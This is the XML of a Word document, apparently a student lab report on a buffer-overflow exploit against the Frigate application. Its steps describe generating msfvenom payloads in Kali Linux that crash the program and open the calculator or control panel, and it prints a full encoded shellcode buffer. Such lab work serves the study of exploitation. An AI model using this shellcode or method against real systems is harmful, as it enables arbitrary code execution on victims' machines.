    <w:p w14:paraId="1B90CB0D" w14:textId="1CCA765C" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00677608"/>
    <w:p w14:paraId="1E2B7516" w14:textId="2B5D9552" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00677608">
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5) After replacing the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>code ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> we again generate a payload and the run it in frigate .The application crashes and opens a calculator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6997E3A8" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00796A44"/>
    <w:p w14:paraId="67833220" w14:textId="471DB9B8" w:rsidR="00044134" w:rsidRDefault="00044134" w:rsidP="00796A44"/>
    <w:p w14:paraId="5A6AAC52" w14:textId="233415EF" w:rsidR="00044134" w:rsidRDefault="00044134" w:rsidP="00796A44">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="013C177D" wp14:editId="6ECF8D5C">
            <wp:extent cx="4290060" cy="231994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384" cy="233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44D9" w14:textId="4376ABA6" w:rsidR="00044134" w:rsidRDefault="00044134" w:rsidP="00796A44"/>
    <w:p w14:paraId="722504C9" w14:textId="00ECC3DA" w:rsidR="00420C0A" w:rsidRDefault="00044134" w:rsidP="00420C0A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66D104F5" wp14:editId="0408561B">
            <wp:extent cx="5277564" cy="2842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99" cy="28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408A" w14:textId="3B12BD67" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="58F8E5E0" w14:textId="5F979D09" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="56705A3B" w14:textId="2F425BDB" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="1FCAB2E8" w14:textId="3E3E39A9" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="7436D7E4" w14:textId="77053B50" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="1EC16513" w14:textId="7C4F4ADD" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="08F7ECA3" w14:textId="2A3DCF81" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="204E5ABC" w14:textId="78FBB416" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="6B38AF5E" w14:textId="78ACA141" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="11B3416A" w14:textId="24E12A4B" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="2681510C" w14:textId="4A0F0124" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="3CAB9C5E" w14:textId="79164F8A" w:rsidR="00D907EB" w:rsidRPr="00D25F50" w:rsidRDefault="00D907EB" w:rsidP="00420C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6) We again perform the same to generate a code for the control panel using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F71E29F" w14:textId="67F64BD4" w:rsidR="00420C0A" w:rsidRDefault="00420C0A" w:rsidP="00420C0A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="090A70FA" wp14:editId="6AE7DCE8">
            <wp:extent cx="5731510" cy="3117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F707" w14:textId="085CC0C8" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="695C683C" w14:textId="41228E94" w:rsidR="00D907EB" w:rsidRPr="00D25F50" w:rsidRDefault="00D907EB" w:rsidP="00420C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">It generates the following </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>code .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70A7778A" w14:textId="63A1EC08" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="604D0355" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>=  b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585AB79" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x89\xe0\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xc2\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74100164" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251261A0" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D37FA2F" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7785CCB7" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x7a\x48\x4c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B7B0B" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x42\x63\x30\x57\x70\x73\x30\x61\x70\x6e\x69\x4a\x45"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C4ADC" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x36\x51\x4b\x70\x71\x74\x4e\x6b\x72\x70\x36\x50\x4e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D50A90C" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x6b\x71\x42\x34\x4c\x6e\x6b\x63\x62\x46\x74\x6c\x4b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A720402" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x64\x32\x77\x58\x34\x4f\x38\x37\x53\x7a\x34\x66\x30"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4310819D" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x31\x6b\x4f\x4c\x6c\x37\x4c\x71\x71\x51\x6c\x33\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B494969" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x36\x4c\x37\x50\x69\x51\x5a\x6f\x44\x4d\x36\x61\x38"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75923821" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x47\x79\x72\x39\x62\x66\x32\x46\x37\x4c\x4b\x36\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058034EA" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x34\x50\x6e\x6b\x61\x5a\x65\x6c\x6e\x6b\x70\x4c\x46"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227AB047" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x71\x31\x68\x78\x63\x51\x58\x36\x61\x6e\x31\x63\x61"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C96145" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4c\x4b\x32\x79\x67\x50\x46\x61\x49\x43\x4c\x4b\x63"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A566DC" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x79\x67\x68\x48\x63\x57\x4a\x57\x39\x4c\x4b\x66\x54"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B67FB1C" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4e\x6b\x65\x51\x69\x46\x75\x61\x79\x6f\x4e\x4c\x4a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F193E4F" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x61\x7a\x6f\x66\x6d\x63\x31\x7a\x67\x66\x58\x6b\x50"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46782E12" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x70\x75\x69\x66\x64\x43\x73\x4d\x6c\x38\x77\x4b\x63"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C4C6C" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4d\x37\x54\x43\x45\x4b\x54\x50\x58\x4e\x6b\x32\x78"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C8395" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x57\x54\x67\x71\x49\x43\x63\x56\x6c\x4b\x54\x4c\x50"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1830B563" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4b\x4e\x6b\x33\x68\x77\x6c\x55\x51\x49\x43\x6e\x6b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB4AAB" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x74\x44\x6c\x4b\x53\x31\x4a\x70\x4d\x59\x42\x64\x56"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C4257" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x44\x65\x74\x53\x6b\x61\x4b\x33\x51\x51\x49\x50\x5a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3369AA45" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x63\x61\x39\x6f\x69\x70\x61\x4f\x43\x6f\x62\x7a\x6e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B5E86A" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x6b\x52\x32\x5a\x4b\x6e\x6d\x61\x4d\x72\x4a\x57\x71"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A21210" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4e\x6d\x6c\x45\x48\x32\x45\x50\x47\x70\x77\x70\x50"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9BA47D" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x50\x35\x38\x34\x71\x6e\x6b\x50\x6f\x4f\x77\x59\x6f"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A021D7D" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x69\x45\x6f\x4b\x78\x70\x6e\x55\x49\x32\x76\x36\x50"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E320239" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x68\x4f\x56\x7a\x35\x4f\x4d\x6f\x6d\x69\x6f\x68\x55"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C3F4A" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x37\x4c\x54\x46\x31\x6c\x36\x6a\x6f\x70\x39\x6b\x4b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0264DA05" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x50\x51\x65\x67\x75\x6f\x4b\x53\x77\x32\x33\x54\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720CA703" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x72\x4f\x52\x4a\x53\x30\x46\x33\x49\x6f\x79\x45\x55"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A701CF2" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x33\x72\x4f\x62\x4e\x33\x44\x63\x42\x50\x6f\x30\x6c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A134E3F" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x43\x30\x41\x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E8D555" w14:textId="794B3B7E" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00420C0A"/>
    <w:p w14:paraId="563656BF" w14:textId="7DAAAE88" w:rsidR="00D907EB" w:rsidRPr="00D25F50" w:rsidRDefault="00D907EB" w:rsidP="00420C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F68CBF" w14:textId="40C86D09" w:rsidR="00D907EB" w:rsidRPr="00D25F50" w:rsidRDefault="00D25F50" w:rsidP="00420C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00D907EB" w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) After the </w:t>
      </w:r>
      <w:r w:rsidR="00CE4138" w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">python code is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CE4138" w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CE4138" w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> it generates a payload . After we run the payload in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CE4138" w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>frigate  it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CE4138" w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> crashes the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE4138" w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>appliciation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE4138" w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and opens the control panel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1069AC9C" w14:textId="410F88BB" w:rsidR="00917256" w:rsidRDefault="00917256" w:rsidP="00420C0A"/>
    <w:p w14:paraId="0BFD4049" w14:textId="07B99A49" w:rsidR="00917256" w:rsidRDefault="00917256" w:rsidP="00420C0A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="698E10D0" wp14:editId="5D365076">
            <wp:extent cx="5234940" cy="147200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779" cy="14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86B5" w14:textId="594081ED" w:rsidR="00917256" w:rsidRDefault="00917256" w:rsidP="00420C0A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74560011" wp14:editId="2F688EF1">
            <wp:extent cx="3436620" cy="202938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5103" cy="20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3ACA" w14:textId="1ECE4DE6" w:rsidR="00917256" w:rsidRDefault="00917256" w:rsidP="00420C0A"/>
    <w:p w14:paraId="6B8F3F60" w14:textId="728FF499" w:rsidR="00917256" w:rsidRDefault="00917256" w:rsidP="00420C0A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DF4E3D2" wp14:editId="6980CCCE">
            <wp:extent cx="5425440" cy="29176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5066" cy="29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7AA2" w14:textId="77777777" w:rsidR="00333431" w:rsidRDefault="00333431" w:rsidP="00420C0A"/>
    <w:p w14:paraId="5248EAF8" w14:textId="2CDC79C4" w:rsidR="00420C0A" w:rsidRDefault="00420C0A" w:rsidP="00420C0A"/>
    <w:p w14:paraId="21382F2B" w14:textId="77777777" w:rsidR="00420C0A" w:rsidRDefault="00420C0A" w:rsidP="00420C0A"/>
    <w:p w14:paraId="178ECD79" w14:textId="5C6D6715" w:rsidR="00B03111" w:rsidRDefault="00B03111" w:rsidP="00796A44"/>
    <w:p w14:paraId="6C187F72" w14:textId="6324948E" w:rsidR="00B03111" w:rsidRDefault="00B03111" w:rsidP="00796A44"/>
    <w:sectPr w:rsidR="00B03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71"/>
    <w:rsid w:val="00044134"/>
    <w:rsid w:val="00333431"/>
    <w:rsid w:val="00420C0A"/>
    <w:rsid w:val="0045582C"/>
    <w:rsid w:val="00677608"/>
    <w:rsid w:val="00796A44"/>
    <w:rsid w:val="008B38D4"/>
    <w:rsid w:val="00917256"/>
    <w:rsid w:val="00AB2C94"/>
    <w:rsid w:val="00B03111"/>
    <w:rsid w:val="00CE4138"/>
    <w:rsid w:val="00D25F50"/>
    <w:rsid w:val="00D907EB"/>
    <w:rsid w:val="00DD541F"/>
    <w:rsid w:val="00D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CE663"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FB5484D8-69EF-4021-B8EB-A780106E5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807</Words>
  <Characters>4601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12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-14T08:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-18T13:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>